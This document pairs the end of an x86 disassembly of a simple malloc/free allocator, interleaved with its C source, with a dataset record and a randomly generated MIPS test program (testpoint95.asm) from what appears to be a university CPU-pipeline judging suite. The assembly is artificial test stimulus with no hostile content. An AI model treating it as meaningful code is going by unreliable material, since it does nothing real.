67d: 8b 00 mov (%eax),%eax
67f: 8b 40 04 mov 0x4(%eax),%eax
682: 01 c2 add %eax,%edx
684: 8b 45 f8 mov -0x8(%ebp),%eax
687: 89 50 04 mov %edx,0x4(%eax)
bp->s.ptr = p->s.ptr->s.ptr;
68a: 8b 45 fc mov -0x4(%ebp),%eax
68d: 8b 00 mov (%eax),%eax
68f: 8b 10 mov (%eax),%edx
691: 8b 45 f8 mov -0x8(%ebp),%eax
694: 89 10 mov %edx,(%eax)
696: eb 0a jmp 6a2 <free+0x9c>
} else
bp->s.ptr = p->s.ptr;
698: 8b 45 fc mov -0x4(%ebp),%eax
69b: 8b 10 mov (%eax),%edx
69d: 8b 45 f8 mov -0x8(%ebp),%eax
6a0: 89 10 mov %edx,(%eax)
if(p + p->s.size == bp){
6a2: 8b 45 fc mov -0x4(%ebp),%eax
6a5: 8b 40 04 mov 0x4(%eax),%eax
6a8: 8d 14 c5 00 00 00 00 lea 0x0(,%eax,8),%edx
6af: 8b 45 fc mov -0x4(%ebp),%eax
6b2: 01 d0 add %edx,%eax
6b4: 39 45 f8 cmp %eax,-0x8(%ebp)
6b7: 75 20 jne 6d9 <free+0xd3>
p->s.size += bp->s.size;
6b9: 8b 45 fc mov -0x4(%ebp),%eax
6bc: 8b 50 04 mov 0x4(%eax),%edx
6bf: 8b 45 f8 mov -0x8(%ebp),%eax
6c2: 8b 40 04 mov 0x4(%eax),%eax
6c5: 01 c2 add %eax,%edx
6c7: 8b 45 fc mov -0x4(%ebp),%eax
6ca: 89 50 04 mov %edx,0x4(%eax)
p->s.ptr = bp->s.ptr;
6cd: 8b 45 f8 mov -0x8(%ebp),%eax
6d0: 8b 10 mov (%eax),%edx
6d2: 8b 45 fc mov -0x4(%ebp),%eax
6d5: 89 10 mov %edx,(%eax)
6d7: eb 08 jmp 6e1 <free+0xdb>
} else
p->s.ptr = bp;
6d9: 8b 45 fc mov -0x4(%ebp),%eax
6dc: 8b 55 f8 mov -0x8(%ebp),%edx
6df: 89 10 mov %edx,(%eax)
freep = p;
6e1: 8b 45 fc mov -0x4(%ebp),%eax
6e4: a3 ac 0a 00 00 mov %eax,0xaac
}
6e9: 90 nop
6ea: c9 leave
6eb: c3 ret
000006ec <morecore>:
static Header*
morecore(uint nu)
{
6ec: f3 0f 1e fb endbr32
6f0: 55 push %ebp
6f1: 89 e5 mov %esp,%ebp
6f3: 83 ec 18 sub $0x18,%esp
char *p;
Header *hp;
if(nu < 4096)
6f6: 81 7d 08 ff 0f 00 00 cmpl $0xfff,0x8(%ebp)
6fd: 77 07 ja 706 <morecore+0x1a>
nu = 4096;
6ff: c7 45 08 00 10 00 00 movl $0x1000,0x8(%ebp)
p = sbrk(nu * sizeof(Header));
706: 8b 45 08 mov 0x8(%ebp),%eax
709: c1 e0 03 shl $0x3,%eax
70c: 83 ec 0c sub $0xc,%esp
70f: 50 push %eax
710: e8 57 fc ff ff call 36c <sbrk>
715: 83 c4 10 add $0x10,%esp
718: 89 45 f4 mov %eax,-0xc(%ebp)
if(p == (char*)-1)
71b: 83 7d f4 ff cmpl $0xffffffff,-0xc(%ebp)
71f: 75 07 jne 728 <morecore+0x3c>
return 0;
721: b8 00 00 00 00 mov $0x0,%eax
726: eb 26 jmp 74e <morecore+0x62>
hp = (Header*)p;
728: 8b 45 f4 mov -0xc(%ebp),%eax
72b: 89 45 f0 mov %eax,-0x10(%ebp)
hp->s.size = nu;
72e: 8b 45 f0 mov -0x10(%ebp),%eax
731: 8b 55 08 mov 0x8(%ebp),%edx
734: 89 50 04 mov %edx,0x4(%eax)
free((void*)(hp + 1));
737: 8b 45 f0 mov -0x10(%ebp),%eax
73a: 83 c0 08 add $0x8,%eax
73d: 83 ec 0c sub $0xc,%esp
740: 50 push %eax
741: e8 c0 fe ff ff call 606 <free>
746: 83 c4 10 add $0x10,%esp
return freep;
749: a1 ac 0a 00 00 mov 0xaac,%eax
}
74e: c9 leave
74f: c3 ret
00000750 <malloc>:
void*
malloc(uint nbytes)
{
750: f3 0f 1e fb endbr32
754: 55 push %ebp
755: 89 e5 mov %esp,%ebp
757: 83 ec 18 sub $0x18,%esp
Header *p, *prevp;
uint nunits;
nunits = (nbytes + sizeof(Header) - 1)/sizeof(Header) + 1;
75a: 8b 45 08 mov 0x8(%ebp),%eax
75d: 83 c0 07 add $0x7,%eax
760: c1 e8 03 shr $0x3,%eax
763: 83 c0 01 add $0x1,%eax
766: 89 45 ec mov %eax,-0x14(%ebp)
if((prevp = freep) == 0){
769: a1 ac 0a 00 00 mov 0xaac,%eax
76e: 89 45 f0 mov %eax,-0x10(%ebp)
771: 83 7d f0 00 cmpl $0x0,-0x10(%ebp)
775: 75 23 jne 79a <malloc+0x4a>
base.s.ptr = freep = prevp = &base;
777: c7 45 f0 a4 0a 00 00 movl $0xaa4,-0x10(%ebp)
77e: 8b 45 f0 mov -0x10(%ebp),%eax
781: a3 ac 0a 00 00 mov %eax,0xaac
786: a1 ac 0a 00 00 mov 0xaac,%eax
78b: a3 a4 0a 00 00 mov %eax,0xaa4
base.s.size = 0;
790: c7 05 a8 0a 00 00 00 movl $0x0,0xaa8
797: 00 00 00
}
for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){
79a: 8b 45 f0 mov -0x10(%ebp),%eax
79d: 8b 00 mov (%eax),%eax
79f: 89 45 f4 mov %eax,-0xc(%ebp)
if(p->s.size >= nunits){
7a2: 8b 45 f4 mov -0xc(%ebp),%eax
7a5: 8b 40 04 mov 0x4(%eax),%eax
7a8: 39 45 ec cmp %eax,-0x14(%ebp)
7ab: 77 4d ja 7fa <malloc+0xaa>
if(p->s.size == nunits)
7ad: 8b 45 f4 mov -0xc(%ebp),%eax
7b0: 8b 40 04 mov 0x4(%eax),%eax
7b3: 39 45 ec cmp %eax,-0x14(%ebp)
7b6: 75 0c jne 7c4 <malloc+0x74>
prevp->s.ptr = p->s.ptr;
7b8: 8b 45 f4 mov -0xc(%ebp),%eax
7bb: 8b 10 mov (%eax),%edx
7bd: 8b 45 f0 mov -0x10(%ebp),%eax
7c0: 89 10 mov %edx,(%eax)
7c2: eb 26 jmp 7ea <malloc+0x9a>
else {
p->s.size -= nunits;
7c4: 8b 45 f4 mov -0xc(%ebp),%eax
7c7: 8b 40 04 mov 0x4(%eax),%eax
7ca: 2b 45 ec sub -0x14(%ebp),%eax
7cd: 89 c2 mov %eax,%edx
7cf: 8b 45 f4 mov -0xc(%ebp),%eax
7d2: 89 50 04 mov %edx,0x4(%eax)
p += p->s.size;
7d5: 8b 45 f4 mov -0xc(%ebp),%eax
7d8: 8b 40 04 mov 0x4(%eax),%eax
7db: c1 e0 03 shl $0x3,%eax
7de: 01 45 f4 add %eax,-0xc(%ebp)
p->s.size = nunits;
7e1: 8b 45 f4 mov -0xc(%ebp),%eax
7e4: 8b 55 ec mov -0x14(%ebp),%edx
7e7: 89 50 04 mov %edx,0x4(%eax)
}
freep = prevp;
7ea: 8b 45 f0 mov -0x10(%ebp),%eax
7ed: a3 ac 0a 00 00 mov %eax,0xaac
return (void*)(p + 1);
7f2: 8b 45 f4 mov -0xc(%ebp),%eax
7f5: 83 c0 08 add $0x8,%eax
7f8: eb 3b jmp 835 <malloc+0xe5>
}
if(p == freep)
7fa: a1 ac 0a 00 00 mov 0xaac,%eax
7ff: 39 45 f4 cmp %eax,-0xc(%ebp)
802: 75 1e jne 822 <malloc+0xd2>
if((p = morecore(nunits)) == 0)
804: 83 ec 0c sub $0xc,%esp
807: ff 75 ec pushl -0x14(%ebp)
80a: e8 dd fe ff ff call 6ec <morecore>
80f: 83 c4 10 add $0x10,%esp
812: 89 45 f4 mov %eax,-0xc(%ebp)
815: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
819: 75 07 jne 822 <malloc+0xd2>
return 0;
81b: b8 00 00 00 00 mov $0x0,%eax
820: eb 13 jmp 835 <malloc+0xe5>
for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){
822: 8b 45 f4 mov -0xc(%ebp),%eax
825: 89 45 f0 mov %eax,-0x10(%ebp)
828: 8b 45 f4 mov -0xc(%ebp),%eax
82b: 8b 00 mov (%eax),%eax
82d: 89 45 f4 mov %eax,-0xc(%ebp)
if(p->s.size >= nunits){
830: e9 6d ff ff ff jmp 7a2 <malloc+0x52>
}
}
835: c9 leave
836: c3 ret
| 35.385689 | 60 | 0.421237 |
6b9594637d2922f64a07a7f045363959745733f4 | 45,028 | asm | Assembly | P6/P6Judger - 100 testpoints/testpoint/testpoint95.asm | flyinglandlord/BUAA-CO-2021 | 1aa28b09762dfb2376ed2aac4126839f0e6fcf93 | [
"MIT"
] | 5 | 2021-12-05T12:58:26.000Z | 2022-03-31T02:05:13.000Z | P6/P6Judger - 100 testpoints/testpoint/testpoint95.asm | OliverDu8-24/BUAA-CO-2021 | 9959abd90de9039d751bab64f153547e76066665 | [
"MIT"
] | null | null | null | P6/P6Judger - 100 testpoints/testpoint/testpoint95.asm | OliverDu8-24/BUAA-CO-2021 | 9959abd90de9039d751bab64f153547e76066665 | [
"MIT"
] | 2 | 2021-12-19T11:49:48.000Z | 2021-12-22T10:25:38.000Z | ori $1, $0, 0
ori $2, $0, 8
ori $3, $0, 14
ori $4, $0, 7
sw $3, 0($0)
sw $3, 4($0)
sw $1, 8($0)
sw $1, 12($0)
sw $2, 16($0)
sw $1, 20($0)
sw $3, 24($0)
sw $3, 28($0)
sw $1, 32($0)
sw $3, 36($0)
sw $3, 40($0)
sw $3, 44($0)
sw $4, 48($0)
sw $3, 52($0)
sw $2, 56($0)
sw $3, 60($0)
sw $1, 64($0)
sw $1, 68($0)
sw $1, 72($0)
sw $1, 76($0)
sw $1, 80($0)
sw $2, 84($0)
sw $1, 88($0)
sw $1, 92($0)
sw $1, 96($0)
sw $4, 100($0)
sw $2, 104($0)
sw $1, 108($0)
sw $4, 112($0)
sw $2, 116($0)
sw $3, 120($0)
sw $1, 124($0)
mflo $1
mthi $2
mult $1, $1
slti $3, $2, 10
TAG1:
multu $3, $3
bgez $3, TAG2
mtlo $3
beq $3, $3, TAG2
TAG2:
mtlo $3
lb $3, 0($3)
lui $4, 9
mult $4, $3
TAG3:
bltz $4, TAG4
sll $0, $0, 0
bgez $4, TAG4
sll $0, $0, 0
TAG4:
mthi $4
mfhi $1
beq $1, $4, TAG5
mthi $1
TAG5:
sltiu $3, $1, 11
bltz $1, TAG6
sll $0, $0, 0
sb $3, 0($3)
TAG6:
mtlo $3
bltz $3, TAG7
xori $4, $3, 10
lh $2, 0($3)
TAG7:
multu $2, $2
bgtz $2, TAG8
andi $4, $2, 4
mthi $2
TAG8:
mfhi $4
mfhi $1
lui $3, 5
sll $0, $0, 0
TAG9:
sub $3, $4, $4
multu $4, $3
mfhi $1
bne $4, $3, TAG10
TAG10:
lbu $2, 0($1)
mthi $1
mult $1, $1
subu $3, $1, $2
TAG11:
sh $3, 0($3)
lui $4, 15
sll $0, $0, 0
lui $1, 15
TAG12:
divu $1, $1
sltu $1, $1, $1
blez $1, TAG13
lui $3, 4
TAG13:
bltz $3, TAG14
mfhi $2
mflo $4
multu $3, $2
TAG14:
lui $4, 4
multu $4, $4
sll $0, $0, 0
bne $4, $4, TAG15
TAG15:
sltiu $3, $4, 8
sllv $4, $4, $3
lhu $4, 0($3)
lhu $4, 0($3)
TAG16:
sw $4, 0($4)
sh $4, 0($4)
mflo $4
lh $2, 0($4)
TAG17:
lui $4, 13
lh $2, 0($2)
mflo $4
addiu $4, $4, 1
TAG18:
divu $4, $4
mult $4, $4
sb $4, 0($4)
lb $2, 0($4)
TAG19:
srav $1, $2, $2
mflo $2
beq $2, $2, TAG20
mfhi $3
TAG20:
sub $4, $3, $3
mult $4, $4
mult $3, $4
bgez $4, TAG21
TAG21:
lui $4, 11
lui $4, 15
sll $0, $0, 0
or $2, $4, $4
TAG22:
sll $0, $0, 0
lui $2, 1
sltu $3, $2, $2
multu $2, $3
TAG23:
lui $1, 6
bltz $3, TAG24
ori $4, $3, 2
lui $3, 10
TAG24:
sll $0, $0, 0
mfhi $3
bgez $3, TAG25
sh $3, 0($3)
TAG25:
lw $4, 0($3)
mflo $2
mtlo $4
mult $4, $2
TAG26:
lw $2, 0($2)
beq $2, $2, TAG27
sra $2, $2, 7
mflo $3
TAG27:
multu $3, $3
sb $3, 0($3)
multu $3, $3
beq $3, $3, TAG28
TAG28:
slti $3, $3, 9
lbu $2, 0($3)
div $3, $3
sb $3, 0($3)
TAG29:
mthi $2
beq $2, $2, TAG30
mfhi $3
mthi $3
TAG30:
blez $3, TAG31
mfhi $4
bgtz $4, TAG31
mthi $4
TAG31:
mtlo $4
mtlo $4
blez $4, TAG32
sh $4, 0($4)
TAG32:
multu $4, $4
mtlo $4
sb $4, 0($4)
subu $2, $4, $4
TAG33:
mthi $2
mthi $2
lui $2, 5
mthi $2
TAG34:
multu $2, $2
lui $4, 3
slt $2, $2, $2
mult $4, $2
TAG35:
bgez $2, TAG36
lui $4, 11
lhu $3, 0($2)
bne $4, $2, TAG36
TAG36:
lui $2, 8
sll $0, $0, 0
mthi $3
lui $1, 12
TAG37:
mfhi $1
xor $3, $1, $1
mflo $2
mflo $3
TAG38:
addu $2, $3, $3
srl $2, $2, 15
lh $4, 0($3)
bgez $4, TAG39
TAG39:
lui $3, 12
lui $4, 0
multu $4, $4
lui $1, 5
TAG40:
sltu $3, $1, $1
bltz $1, TAG41
lui $2, 2
sll $0, $0, 0
TAG41:
addu $4, $2, $2
srav $4, $2, $4
sll $0, $0, 0
mtlo $2
TAG42:
sra $4, $1, 13
lui $4, 9
mult $4, $1
mflo $3
TAG43:
bgtz $3, TAG44
lui $3, 9
lui $2, 14
mflo $2
TAG44:
multu $2, $2
slti $3, $2, 0
lui $1, 10
xor $1, $3, $2
TAG45:
mthi $1
mflo $4
mfhi $3
sltiu $4, $1, 9
TAG46:
mfhi $2
div $4, $4
multu $4, $2
mtlo $4
TAG47:
lui $4, 9
divu $2, $4
blez $2, TAG48
sll $0, $0, 0
TAG48:
mflo $4
mthi $2
sb $2, 0($4)
xor $1, $4, $4
TAG49:
bgtz $1, TAG50
lh $3, 0($1)
bne $1, $1, TAG50
and $1, $3, $3
TAG50:
lui $2, 15
mult $2, $2
lh $2, 0($1)
sw $2, 0($1)
TAG51:
mfhi $2
beq $2, $2, TAG52
mflo $1
bltz $2, TAG52
TAG52:
multu $1, $1
sw $1, 0($1)
bgez $1, TAG53
multu $1, $1
TAG53:
mult $1, $1
andi $2, $1, 5
nor $3, $2, $2
beq $2, $3, TAG54
TAG54:
sw $3, 1($3)
slti $4, $3, 11
beq $4, $3, TAG55
mthi $3
TAG55:
andi $4, $4, 10
lh $3, 0($4)
bne $3, $4, TAG56
lbu $3, 1($3)
TAG56:
div $3, $3
mthi $3
sb $3, -255($3)
sh $3, -255($3)
TAG57:
mflo $2
lui $1, 9
mtlo $2
sb $3, 0($2)
TAG58:
srl $2, $1, 11
mflo $3
blez $1, TAG59
sh $3, -288($2)
TAG59:
lui $4, 3
mfhi $3
bne $3, $3, TAG60
sll $0, $0, 0
TAG60:
mult $3, $3
lui $2, 0
multu $2, $3
beq $3, $3, TAG61
TAG61:
mthi $2
mthi $2
addi $3, $2, 7
mfhi $4
TAG62:
mfhi $1
or $3, $1, $4
lbu $2, 0($4)
srl $1, $3, 8
TAG63:
srlv $3, $1, $1
lui $2, 5
bgtz $1, TAG64
lui $2, 3
TAG64:
sll $0, $0, 0
andi $1, $2, 5
subu $2, $2, $1
mflo $4
TAG65:
blez $4, TAG66
srav $4, $4, $4
bne $4, $4, TAG66
mflo $3
TAG66:
bne $3, $3, TAG67
ori $2, $3, 7
beq $2, $3, TAG67
xori $2, $2, 3
TAG67:
bgez $2, TAG68
mthi $2
blez $2, TAG68
sb $2, 0($2)
TAG68:
sra $1, $2, 14
srlv $3, $2, $1
ori $4, $2, 15
mtlo $4
TAG69:
multu $4, $4
sb $4, 0($4)
subu $2, $4, $4
mflo $1
TAG70:
sll $0, $0, 0
blez $1, TAG71
lui $2, 11
subu $1, $4, $2
TAG71:
slti $1, $1, 9
bgez $1, TAG72
div $1, $1
subu $3, $1, $1
TAG72:
lhu $2, 0($3)
addiu $4, $2, 3
lb $1, 0($3)
mthi $3
TAG73:
lb $2, 0($1)
beq $2, $2, TAG74
xor $2, $2, $2
beq $2, $2, TAG74
TAG74:
lui $3, 1
lui $3, 9
mult $3, $2
mult $2, $2
TAG75:
lui $3, 15
sll $0, $0, 0
mflo $4
addiu $3, $3, 6
TAG76:
mfhi $4
lui $1, 13
bltz $4, TAG77
sub $1, $1, $4
TAG77:
sll $0, $0, 0
sll $0, $0, 0
blez $4, TAG78
sll $0, $0, 0
TAG78:
sb $4, 0($4)
lui $2, 4
bltz $2, TAG79
mthi $2
TAG79:
srav $2, $2, $2
lui $4, 4
sll $3, $2, 2
multu $3, $2
TAG80:
lui $3, 12
xori $3, $3, 0
mflo $2
lui $4, 13
TAG81:
mtlo $4
sll $0, $0, 0
mtlo $4
bne $4, $4, TAG82
TAG82:
sra $2, $4, 8
mfhi $2
divu $4, $4
beq $2, $2, TAG83
TAG83:
sh $2, 0($2)
lui $2, 7
mflo $3
addu $3, $2, $2
TAG84:
bne $3, $3, TAG85
srlv $1, $3, $3
subu $4, $3, $1
subu $3, $4, $1
TAG85:
sll $0, $0, 0
beq $3, $3, TAG86
ori $3, $3, 12
sw $3, 0($3)
TAG86:
mtlo $3
sll $1, $3, 8
sll $0, $0, 0
beq $3, $1, TAG87
TAG87:
mfhi $3
beq $1, $3, TAG88
sll $0, $0, 0
bgez $1, TAG88
TAG88:
lui $1, 10
bne $1, $1, TAG89
mfhi $4
lui $2, 14
TAG89:
addiu $2, $2, 3
andi $1, $2, 8
sltiu $4, $2, 3
sll $0, $0, 0
TAG90:
sw $4, 0($4)
lh $2, 0($4)
slti $1, $4, 15
lhu $4, 0($2)
TAG91:
mult $4, $4
mtlo $4
mthi $4
lui $2, 8
TAG92:
xor $4, $2, $2
mthi $2
xori $1, $2, 13
sll $0, $0, 0
TAG93:
lui $1, 3
beq $1, $1, TAG94
lui $1, 6
lw $2, 0($1)
TAG94:
sll $0, $0, 0
beq $2, $2, TAG95
multu $2, $2
mfhi $2
TAG95:
mtlo $2
lui $1, 3
blez $1, TAG96
sll $0, $0, 0
TAG96:
mflo $2
sb $2, 0($3)
mflo $4
lui $3, 14
TAG97:
mfhi $3
sb $3, 0($3)
mtlo $3
mthi $3
TAG98:
blez $3, TAG99
multu $3, $3
lhu $1, 0($3)
mflo $2
TAG99:
mtlo $2
bne $2, $2, TAG100
mtlo $2
bne $2, $2, TAG100
TAG100:
lui $4, 14
bltz $4, TAG101
mflo $3
bgtz $3, TAG101
TAG101:
addiu $1, $3, 13
div $1, $1
ori $3, $3, 4
beq $3, $3, TAG102
TAG102:
and $2, $3, $3
mtlo $2
bgtz $2, TAG103
mflo $3
TAG103:
srl $2, $3, 5
mflo $1
lbu $4, -4100($1)
bgez $2, TAG104
TAG104:
xori $1, $4, 13
lui $1, 9
ori $2, $1, 10
mflo $4
TAG105:
mthi $4
bgez $4, TAG106
div $4, $4
mthi $4
TAG106:
bne $4, $4, TAG107
ori $2, $4, 14
mult $4, $2
sh $4, -4100($4)
TAG107:
sll $0, $0, 0
lui $2, 0
bne $2, $2, TAG108
mfhi $4
TAG108:
beq $4, $4, TAG109
mflo $1
lb $1, 0($1)
bltz $1, TAG109
TAG109:
mfhi $1
subu $1, $1, $1
mult $1, $1
nor $4, $1, $1
TAG110:
addiu $3, $4, 3
srav $3, $4, $4
lbu $3, 1($3)
sb $3, 0($3)
TAG111:
sw $3, 0($3)
lui $1, 13
lw $2, 0($3)
ori $4, $2, 4
TAG112:
bgtz $4, TAG113
sw $4, 0($4)
sltu $1, $4, $4
andi $2, $1, 1
TAG113:
sltiu $4, $2, 4
lui $3, 1
slti $1, $4, 4
add $1, $4, $2
TAG114:
mthi $1
sllv $2, $1, $1
srl $1, $2, 11
lw $1, 0($2)
TAG115:
div $1, $1
bne $1, $1, TAG116
mthi $1
bgez $1, TAG116
TAG116:
mthi $1
sh $1, 0($1)
and $3, $1, $1
lui $2, 8
TAG117:
mtlo $2
sll $0, $0, 0
mtlo $2
multu $2, $2
TAG118:
sra $3, $2, 7
subu $1, $2, $2
lui $1, 14
sll $0, $0, 0
TAG119:
sll $0, $0, 0
bgez $2, TAG120
mtlo $3
addu $2, $2, $3
TAG120:
mult $2, $2
lui $2, 14
beq $2, $2, TAG121
div $2, $2
TAG121:
mtlo $2
subu $1, $2, $2
mfhi $4
sb $2, 0($1)
TAG122:
lb $4, 0($4)
slt $3, $4, $4
sllv $1, $3, $4
mtlo $4
TAG123:
sh $1, 0($1)
beq $1, $1, TAG124
mflo $3
bltz $1, TAG124
TAG124:
add $4, $3, $3
sw $4, 0($4)
blez $4, TAG125
lui $3, 3
TAG125:
bltz $3, TAG126
mult $3, $3
sll $0, $0, 0
blez $3, TAG126
TAG126:
div $3, $3
multu $3, $3
mfhi $2
mthi $2
TAG127:
sb $2, 0($2)
div $2, $2
lui $3, 3
beq $3, $3, TAG128
TAG128:
divu $3, $3
mthi $3
sll $0, $0, 0
div $3, $3
TAG129:
xor $3, $3, $3
lui $3, 7
bltz $3, TAG130
sll $0, $0, 0
TAG130:
mflo $3
bgtz $3, TAG131
mfhi $1
sw $3, 0($1)
TAG131:
srav $4, $1, $1
lb $1, 0($1)
bgez $1, TAG132
sb $4, 0($1)
TAG132:
mult $1, $1
mflo $1
sw $1, 0($1)
lhu $1, 0($1)
TAG133:
bgez $1, TAG134
lui $4, 2
mfhi $1
add $2, $1, $1
TAG134:
bne $2, $2, TAG135
lui $4, 15
lb $3, 0($2)
mtlo $2
TAG135:
bgez $3, TAG136
mult $3, $3
xori $4, $3, 5
mthi $3
TAG136:
mflo $1
divu $4, $1
mult $1, $1
bne $4, $4, TAG137
TAG137:
mtlo $1
lui $1, 5
sll $0, $0, 0
bne $1, $1, TAG138
TAG138:
lui $4, 12
xor $4, $3, $4
lui $3, 10
bgez $4, TAG139
TAG139:
lui $2, 8
bne $3, $3, TAG140
divu $2, $2
sll $0, $0, 0
TAG140:
sll $0, $0, 0
sra $1, $1, 8
mtlo $1
mtlo $1
TAG141:
sll $0, $0, 0
mthi $1
ori $4, $1, 7
mflo $4
TAG142:
subu $2, $4, $4
lui $3, 6
mflo $2
mult $2, $2
TAG143:
lui $2, 1
mtlo $2
div $2, $2
blez $2, TAG144
TAG144:
sll $4, $2, 10
lui $3, 6
beq $2, $4, TAG145
sltiu $4, $4, 7
TAG145:
mflo $2
xori $3, $4, 10
mflo $2
beq $2, $3, TAG146
TAG146:
sb $2, 0($2)
sb $2, 0($2)
ori $2, $2, 14
lbu $2, 0($2)
TAG147:
ori $4, $2, 10
beq $4, $2, TAG148
divu $4, $4
srl $4, $2, 5
TAG148:
srlv $3, $4, $4
bltz $3, TAG149
mtlo $3
multu $3, $3
TAG149:
bgtz $3, TAG150
mflo $4
sb $4, 0($3)
sh $3, 0($4)
TAG150:
lw $3, 0($4)
bgez $3, TAG151
srlv $1, $4, $3
sb $1, 0($3)
TAG151:
and $1, $1, $1
andi $2, $1, 14
mflo $1
addiu $2, $1, 10
TAG152:
lhu $3, 0($2)
add $1, $3, $3
blez $1, TAG153
lhu $4, 0($3)
TAG153:
lb $4, 0($4)
sllv $4, $4, $4
addu $2, $4, $4
mflo $1
TAG154:
sra $3, $1, 7
lui $4, 13
mfhi $1
mfhi $1
TAG155:
multu $1, $1
lui $4, 3
addi $4, $1, 5
lw $3, 0($1)
TAG156:
mfhi $4
mflo $1
blez $3, TAG157
xori $4, $1, 13
TAG157:
lbu $3, 0($4)
mult $3, $3
lui $2, 6
blez $2, TAG158
TAG158:
lui $3, 2
beq $3, $2, TAG159
div $3, $3
lui $2, 1
TAG159:
sll $0, $0, 0
mfhi $2
beq $2, $2, TAG160
ori $3, $2, 11
TAG160:
addiu $1, $3, 4
lui $4, 3
sll $0, $0, 0
mflo $4
TAG161:
sllv $4, $4, $4
xor $3, $4, $4
sltiu $3, $4, 13
mthi $3
TAG162:
ori $4, $3, 6
mthi $4
or $3, $3, $3
mthi $3
TAG163:
beq $3, $3, TAG164
mtlo $3
andi $3, $3, 6
mfhi $3
TAG164:
beq $3, $3, TAG165
sb $3, 0($3)
bne $3, $3, TAG165
sub $3, $3, $3
TAG165:
mfhi $4
beq $4, $3, TAG166
lbu $2, 0($4)
lbu $3, 0($2)
TAG166:
sb $3, 0($3)
addu $4, $3, $3
blez $3, TAG167
mtlo $4
TAG167:
mtlo $4
addu $3, $4, $4
mthi $4
mtlo $3
TAG168:
beq $3, $3, TAG169
mult $3, $3
divu $3, $3
div $3, $3
TAG169:
sw $3, 0($3)
mthi $3
lh $2, 0($3)
sltiu $1, $2, 10
TAG170:
mfhi $2
mthi $1
sb $1, 0($1)
sb $1, 0($1)
TAG171:
lb $3, 0($2)
sw $3, 0($3)
addu $1, $2, $3
mflo $2
TAG172:
sw $2, 0($2)
beq $2, $2, TAG173
mfhi $2
lhu $2, 0($2)
TAG173:
sllv $1, $2, $2
bltz $2, TAG174
mthi $2
div $1, $2
TAG174:
bgtz $1, TAG175
lh $3, 0($1)
mthi $1
addi $3, $3, 0
TAG175:
lui $4, 1
nor $1, $3, $3
addiu $3, $1, 3
xori $2, $1, 4
TAG176:
bgtz $2, TAG177
div $2, $2
mult $2, $2
lui $1, 13
TAG177:
sll $0, $0, 0
mult $1, $1
div $1, $1
xor $2, $1, $1
TAG178:
lui $3, 9
sll $2, $3, 12
sll $0, $0, 0
lui $3, 11
TAG179:
sll $0, $0, 0
lui $2, 13
lui $2, 10
bne $2, $2, TAG180
TAG180:
div $2, $2
sll $0, $0, 0
mult $2, $2
addiu $3, $3, 1
TAG181:
bne $3, $3, TAG182
sll $0, $0, 0
slt $4, $2, $2
blez $4, TAG182
TAG182:
subu $4, $4, $4
sltiu $3, $4, 3
beq $4, $3, TAG183
addiu $4, $3, 8
TAG183:
sb $4, 0($4)
div $4, $4
divu $4, $4
mult $4, $4
TAG184:
lui $2, 1
addiu $4, $2, 8
sll $0, $0, 0
beq $3, $3, TAG185
TAG185:
mfhi $2
mflo $3
bne $2, $2, TAG186
or $3, $3, $3
TAG186:
mfhi $3
mflo $2
multu $3, $3
nor $3, $3, $3
TAG187:
srl $3, $3, 14
bltz $3, TAG188
div $3, $3
sll $0, $0, 0
TAG188:
sb $2, 0($2)
lui $4, 11
mthi $2
addu $1, $2, $4
TAG189:
lui $4, 14
sll $0, $0, 0
blez $4, TAG190
sll $0, $0, 0
TAG190:
mthi $4
sll $0, $0, 0
sll $0, $0, 0
sll $0, $0, 0
TAG191:
slt $1, $4, $4
lui $1, 15
mthi $1
mflo $3
TAG192:
sb $3, 0($3)
mthi $3
lui $4, 9
beq $3, $3, TAG193
TAG193:
lui $1, 15
sll $0, $0, 0
lui $1, 7
mthi $1
TAG194:
mthi $1
mthi $1
addu $2, $1, $1
srl $3, $1, 6
TAG195:
mflo $3
bne $3, $3, TAG196
lb $1, 0($3)
xor $4, $3, $3
TAG196:
mthi $4
blez $4, TAG197
mflo $3
bltz $3, TAG197
TAG197:
slti $2, $3, 7
lui $3, 1
bne $3, $3, TAG198
mthi $2
TAG198:
mflo $2
slt $1, $3, $3
bgez $1, TAG199
mfhi $4
TAG199:
bgtz $4, TAG200
multu $4, $4
bne $4, $4, TAG200
lui $4, 14
TAG200:
lui $2, 3
sb $4, 0($4)
multu $4, $2
lui $4, 1
TAG201:
mfhi $1
sll $0, $0, 0
lui $3, 5
bne $1, $3, TAG202
TAG202:
mthi $3
multu $3, $3
bgez $3, TAG203
sll $0, $0, 0
TAG203:
bgez $3, TAG204
lui $1, 5
bltz $3, TAG204
sw $1, 0($3)
TAG204:
bgtz $1, TAG205
addiu $3, $1, 15
addi $4, $1, 1
bne $3, $3, TAG205
TAG205:
sltu $4, $4, $4
mflo $3
bne $4, $4, TAG206
lui $1, 14
TAG206:
sll $0, $0, 0
sll $0, $0, 0
bne $2, $1, TAG207
multu $1, $1
TAG207:
sll $0, $0, 0
ori $2, $4, 2
sw $2, 0($4)
mult $2, $4
TAG208:
lhu $1, 0($2)
mtlo $2
divu $1, $2
bne $1, $1, TAG209
TAG209:
mflo $3
sll $3, $1, 6
mtlo $1
lh $1, 0($3)
TAG210:
srav $4, $1, $1
addiu $3, $1, 3
multu $3, $4
lui $3, 15
TAG211:
sll $0, $0, 0
mflo $2
sw $3, 0($2)
mfhi $3
TAG212:
sw $3, 0($3)
lui $3, 4
lui $3, 0
mflo $2
TAG213:
sub $3, $2, $2
lw $2, 0($3)
mflo $4
bgez $3, TAG214
TAG214:
subu $4, $4, $4
lbu $2, 0($4)
srav $1, $4, $4
beq $1, $1, TAG215
TAG215:
lui $2, 4
bgtz $1, TAG216
sll $0, $0, 0
sra $2, $2, 1
TAG216:
sll $0, $0, 0
mfhi $1
mult $1, $2
mthi $2
TAG217:
add $3, $1, $1
blez $1, TAG218
mult $1, $1
bne $3, $1, TAG218
TAG218:
mthi $3
subu $2, $3, $3
blez $2, TAG219
andi $2, $2, 8
TAG219:
sllv $1, $2, $2
mult $2, $1
lui $4, 10
mfhi $3
TAG220:
sra $3, $3, 13
mfhi $1
sh $3, 0($3)
mfhi $1
TAG221:
multu $1, $1
mtlo $1
mthi $1
sll $3, $1, 1
TAG222:
mthi $3
mult $3, $3
beq $3, $3, TAG223
mfhi $2
TAG223:
mtlo $2
mfhi $1
lui $2, 3
lb $1, 0($1)
TAG224:
slt $3, $1, $1
sra $2, $1, 5
lui $2, 4
mult $3, $2
TAG225:
lui $1, 10
sllv $2, $2, $1
sll $0, $0, 0
subu $3, $1, $2
